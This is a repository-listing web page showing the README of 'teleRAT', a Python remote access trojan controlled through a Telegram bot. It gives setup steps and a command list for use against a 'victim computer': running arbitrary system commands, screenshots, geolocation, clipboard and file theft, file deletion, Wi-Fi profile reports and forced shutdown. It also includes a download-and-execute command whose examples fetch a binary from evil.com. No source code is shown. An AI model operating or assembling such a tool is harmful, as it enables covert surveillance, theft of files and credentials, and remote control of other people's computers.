Telegram RAT written in Python

Related tags

Third-party APIs Wrapperspythonmalwareratmalware-researchremote-admin-tool
Overview

teleRAT

Python based RAT that uses Telegram for sending commands and receiving data to and from a victim computer.

Setup.py

  1. Insert your API key into the api variable inside the setup.py script & run it. This will setup your Telegram chat with your created bot with the necessary commands to avoid inserting each command along with the help message.
  • Read here to create your own bot and obtain your API token.
  1. Install necessary requirements: pip install -r requirements.txt
  2. Send a command to your Telegram bot
  3. Run python3 main.py

Available Commands

  • /whoami - returns username. no additional arguments required.
  • /screenshot - takes screenshots. requires the number of screenshots to take (EX: /screenshot 5 <- to take 5 screenshots)
  • /location - returns location info (region, state, zip code, estimated coordinates, timezone, country, ip address)
  • /metadata - returns metadata info about a specified file. requires filepath as an additional argument (EX: /metadata C:\Users\Username\Files\special.java <- will return metadata info about special.java)
  • /execute - executes specified system command. requires 2 additional arguments: the system command and additional arguments to pass to that system command (EX: /execute cmd.exe [/c,ver] or /execute binary.exe none} in order to execute binary.exe with no arguments)
  • /power - allows operator to shutoff, hibernate, or restart computer. requires 1 additional argument: hibernate, pd (to power down), or restart (EX: /power pd <- to power down the victim's computer)
  • /ls - provides operator with directory listing. If no additional argument is provided, it provides directory listing for directory in which malware is. Additional argument of a directory is optional (EX: /ls %APPDATA% <- provides directory listing for APPDATA directory)
  • /delete - deletes a user specified file. Additional argument of filepath is required (EX: /delete C:\Users\Username\Files\temp.txt <- deletes a file named temp.txt)
  • /wreport - provides information regarding the wireless profiles the computer has connected to in the past, the drivers, and a list of wireless interfaces.
  • /remotebinary - download and execute a remote binary. Requires 2 additional arguments: the URL where the binary is and any additional arguments to pass when executing the binary (EX: /remotebinary https://evil.com/file.exe noargs <- execute file.exe with no arguments or /remotebinary https://evil.com/file.exe [-c,-f] <- to execute file.exe with flags c & f)
  • /processes - returns a list of running processes and services
  • /gather - return a specified file. requires 1 additional argument: the filepath (EX: /gather C:\Users\username\important\file.xlsx <- grab and upload file.xlsx to Telegram chat)
  • /report - provides a hardware report & Windows version to operator
  • /playnoise - plays a user specified noise. available list of noises include: asterisk sound (asterisk), exclamation sound (exclamation), exit sound (exit), hand sound (hand), question sound (question), and beep (beep) (EX: /playnoise beep or /playnoise question)
  • /gatherclip - returns data currently copied in the victim's clipboard. requires no additional arguments.
  • /messagebox - will present the victim with a message box. 2 additional arguments are required: caption and title for the window (EX: /messagebox </li> </ul> </article> </div> </div> </div> <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js" type="3463953c43b18c592a02463e-text/javascript"></script> <ins class="adsbygoogle" style="display:block" data-ad-format="autorelaxed" data-ad-client="ca-pub-2693323733590204" data-ad-slot="1585190487"></ins> <script type="3463953c43b18c592a02463e-text/javascript">(adsbygoogle = window.adsbygoogle || []).push({});</script> </div> <div class="col-lg-4 right"> <div id="basic" class="tab-pane fade show active"> <div class="box shadow-sm rounded bg-white mb-3"> <div class="box-title border-bottom p-3"> <h6 class="m-0">Owner</h6> </div> <div class="d-flex align-items-center p-3 job-item-header"> <div class="overflow-hidden mr-2"> <h6 class="font-weight-bold -dark mb-0 text-truncate"> </h6> <div class="small text-gray-500"> </div> </div> <img class="img-fluid ml-auto" style="border-radius: 50%;" src="https://avatars.githubusercontent.com/u/56985822?v=4&s=60" alt=""> </div> <div class="box-body p-3"> <a href="/repo/gitHubRepo/1d8-teleRAT-python-third-party-apis-wrappers" rel="nofollow" target="_blank" class="btn btn-lg btn-block btn-danger mb-3"><i class="fa fa-github" aria-hidden="true"></i> GitHub Repository</a> </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/pytopia-project-nashenas-telegram-bot"><h6 class="font-weight-bold ">Telegram Bot to Connect Strangers</h6></a> <p class="mb-0 text-muted"> Telegram Bot to Connect Strangers How to Run Set your telegram bot token as environment variable TELEGRAM_BOT_TOKEN: export TELEGRAM_BOT_TOKEN=your_t</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/96030076?v=4&s=60" alt="PyTopia"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 12 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 24, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/rudranag-Truecaller-telegram_bot"><h6 class="font-weight-bold ">Telegram bot which has truecaller and smsbomber features</h6></a> <p class="mb-0 text-muted"> Truecaller-telegram_bot Add your telegram bot api key in main.py and you are good to go To get a api key Goto telegram and search BotFather From the c</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/18360891?v=4&s=60" alt="Rudranag"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 32 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 05, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/mLewisLogic-foursquare-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">The Foursquare API client for Python</h6></a> <p class="mb-0 text-muted"> foursquare Python client for the foursquare API. Philosophy: Map foursquare's endpoints one-to-one Clean, simple, Pythonic calls Only handle raw data,</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/311322?v=4&s=60" alt="Mike Lewis"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 400 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 19, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/arista-eosplus-pyeapi-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">Python client for Arista eAPI</h6></a> <p class="mb-0 text-muted"> Arista eAPI Python Library The Python library for Arista's eAPI command API implementation provides a client API work using eAPI and communicating wit</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/6643264?v=4&s=60" alt="Arista Networks EOS+"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 124 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Nov 23, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/ScribeMD-slack-templates"><h6 class="font-weight-bold ">Send Informative, Concise Slack Notifications With Minimal Effort</h6></a> <p class="mb-0 text-muted"> slack-templates Send Informative, Concise Slack Notifications With Minimal Effort slack-templates Slack Integration Available Templates Usage Report t</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/78177662?v=4&s=60" alt=""> <i class="fa fa-star ml-3" aria-hidden="true"></i> 9 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Nov 03, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/polm-random-backlog-tweet"><h6 class="font-weight-bold ">Random-backlog-tweet - Pick a page from a sitemap at random and prep a tweet button for it</h6></a> <p class="mb-0 text-muted"> Random-backlog-tweet - Pick a page from a sitemap at random and prep a tweet button for it</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/286278?v=4&s=60" alt="Paul O'Leary McCann"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 0 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 01, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/public-apis-public-apis-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">A collective list of free APIs for use in software and web development.</h6></a> <p class="mb-0 text-muted"> Public APIs A collective list of free APIs for use in software and web development. A public API for this project can be found here! For information o</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/51121562?v=4&s=60" alt=""> <i class="fa fa-star ml-3" aria-hidden="true"></i> 222.5k <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jan 02, 2023 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/TeamGroupMenter-GroupMenter"><h6 class="font-weight-bold ">GroupMenter : New Telegram Group Manager Bot🔸Fast 🔸Python🔸Pyrogram 🔸</h6></a> <p class="mb-0 text-muted"> GroupMenter An PowerFull Group Manager Bot. Written In Pytelethon. Info • A modular Telegram Python bot running on python3. • Can be found on telegram</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/83908896?v=4&s=60" alt="Group Menter"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 24 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jun 28, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/IDN-C-X-IDN-Unzip-Bot"><h6 class="font-weight-bold ">A Telegram Bot to Extract Various Types Of Archives</h6></a> <p class="mb-0 text-muted"> IDN Unzip Bot A Telegram Bot to Extract Various Types Of Archives Features Extract various types of archives like rar, zip, tar, 7z, tar.xz etc. Passw</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/91923050?v=4&s=60" alt="IDNCoderX"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 8 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jul 25, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/linkml-fairstructure"><h6 class="font-weight-bold ">Fairstructure - Structure your data in a FAIR way using google sheets or TSVs</h6></a> <p class="mb-0 text-muted"> Fairstructure - Structure your data in a FAIR way using google sheets or TSVs. These are then converted to LinkML, and from there other formats</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/79337873?v=4&s=60" alt="Linked data Modeling Language"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 23 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 01, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/titulebolide-binance-report-bot"><h6 class="font-weight-bold ">Monitor your Binance portfolio</h6></a> <p class="mb-0 text-muted"> Binance Report Bot The intent of this bot is to take a snapshot of your binance wallet, e.g. the current balances and store it for further plotting. I</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/44905741?v=4&s=60" alt=""> <i class="fa fa-star ml-3" aria-hidden="true"></i> 37 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Oct 29, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/Natthanon823-discord-bot-license"><h6 class="font-weight-bold ">Discord bot that manages expiration of roles with subscriptions!</h6></a> <p class="mb-0 text-muted"> Discord bot that manages expiration of roles with subscriptions!</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/59871949?v=4&s=60" alt="Chakeaw__"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 3 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Apr 28, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/elasticsales-closeio-api--python-third-party-apis-wrappers"><h6 class="font-weight-bold ">Python API Client for Close</h6></a> <p class="mb-0 text-muted"> Close API A convenient Python wrapper for the Close API. API docs: http://developer.close.com Support: <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="8dfef8fdfde2fff9cdeee1e</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/437267?v=4&s=60" alt="Close"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 56 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Nov 30, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/SAIBYADAS-HinamiRobot"><h6 class="font-weight-bold ">HinamiRobot - Telegram Group Manager Bot Written In Python Using Pyrogram</h6></a> <p class="mb-0 text-muted"> ✨ HINAMI CHAN ✨ Telegram Group Manager Bot Written In Python Using Pyrogram. Rea</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/93474939?v=4&s=60" alt="DARK LEGEND088"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 2 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jan 27, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/Ibukiyoshidaa-TwitterFindNewFriend"><h6 class="font-weight-bold ">Twitter bot that finds new friends in Twitter.</h6></a> <p class="mb-0 text-muted"> PythonTwitterBot Twitter Bot Thats Find New Friends pip install textblob pip install tweepy pip install googletrans check requirements.txt file Env</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/81926489?v=4&s=60" alt="IbukiYoshida"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 4 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Aug 11, 2021 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/SkidenFly-Embed-Sender-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">Send embeds using your discord personal account</h6></a> <p class="mb-0 text-muted"> Welcome to Embed Sender 👋 Send embeds using your discord personal account Install pip install -r requirements.txt Usage Put your discord token in ./</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/70416087?v=4&s=60" alt="SkydenFly"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 11 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Sep 07, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/animesdsd-smilecreator4"><h6 class="font-weight-bold ">Smilecreator4 - This site is for people who want to hack or want to learn it!</h6></a> <p class="mb-0 text-muted"> smilecreator4 This site is for people who want to hack or want to learn it! Furthermore, this program does not work without turning off Antivirus or W</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/73724834?v=4&s=60" alt=""> <i class="fa fa-star ml-3" aria-hidden="true"></i> 1 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jan 04, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/Zverik-bot_na_rayone"><h6 class="font-weight-bold ">Local community telegram bot</h6></a> <p class="mb-0 text-muted"> Бот на районе Телеграм-бот для поиска адресов и заведений в вашем районе города или в небольшом городке. Требует недели прогулок по району д</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/766031?v=4&s=60" alt="Ilya Zverev"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 32 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jan 19, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/Camden-png-pico8-discord"><h6 class="font-weight-bold ">A Discord bot that controls Pico-8.</h6></a> <p class="mb-0 text-muted"> Pico-8 Discord Bot Synopsis: A Discord bot that controls Pico-8. Please let me know if you make any games with this tool! I will simplify the discord.</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/46905140?v=4&s=60" alt="Camden"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 1 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jan 28, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/Teejayx6-6ix-Bot-Source"><h6 class="font-weight-bold ">A bot i made for a dead com server lol it gets updated daily etc </h6></a> <p class="mb-0 text-muted"> 6ix-Bot-Source A bot i made for a dead com server lol it gets updated daily etc For The UserAgent CMD https://developers.whatismybrowser.com/ thats a </p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/89560897?v=4&s=60" alt="Swiper"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 9 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Mar 10, 2022 </div> </div> </div> </div> </div> </div> <footer class="bg-white"> <div class="container"> <div class="copyright"> <div class="logo"> <a href="/"> <img src="/assets/images/logo_pythonrepo.png"> </a> </div> <p>2022.PythonRepo </p> <ul class="social"> <li> <a href="/about">About</a>   </li> <li> <a href="/contact">Contact Us</a>   </li> <li> <a href="/dmca">DMCA</a>   </li> <li> <a href="/disclaimer">Disclaimer</a>   </li> <li> <a href="/privacypolicy">Privacy Policy</a>   </li> </ul> </div> </div> </footer> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js" integrity="sha512-bnIvzh6FU75ZKxp0GXLH9bewza/OIw6dLVh9ICg0gogclmYGguQJWl8U30WpbsGTqbIiAwxTsbe76DErLq5EDQ==" crossorigin="anonymous" type="3463953c43b18c592a02463e-text/javascript"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.5.0/js/bootstrap.bundle.min.js" integrity="sha512-Oy5BruJdE3gP9+LMJ11kC5nErkh3p4Y0GawT1Jrcez4RTDxODf3M/KP3pEsgeOYxWejqy2SPnj+QMpgtvhDciQ==" crossorigin="anonymous" type="3463953c43b18c592a02463e-text/javascript"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/select2/4.0.13/js/select2.min.js" integrity="sha512-2ImtlRlf2VVmiGZsjm9bEyhjGW4dU7B6TNwh/hx/iSByxNENtj3WVE6o/9Lj4TJeVXPi4bnOIMXFIJJAeufa0A==" crossorigin="anonymous" type="3463953c43b18c592a02463e-text/javascript"></script> <script src="/assets/js/custom.js" type="3463953c43b18c592a02463e-text/javascript"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.lazyload/1.9.1/jquery.lazyload.min.js" type="3463953c43b18c592a02463e-text/javascript"></script> <script type="3463953c43b18c592a02463e-text/javascript"> $(function() { $("img.lazy").lazyload({ threshold :180, failurelimit :20, effect : "fadeIn" }); }); </script> <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/10.5.0/highlight.min.js" type="3463953c43b18c592a02463e-text/javascript"></script> <script type="3463953c43b18c592a02463e-text/javascript"> hljs.initHighlightingOnLoad(); </script> <script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="3463953c43b18c592a02463e-|49" defer=""></script> <script src="/static/js/jquery-3.6.0.min.js" type="text/javascript"></script> <script src="/adview_pic_cpc_cpm_cpa_guanggao_gg_ads_300x250.js?v=1751571737" type="text/javascript"></script> </body> </html>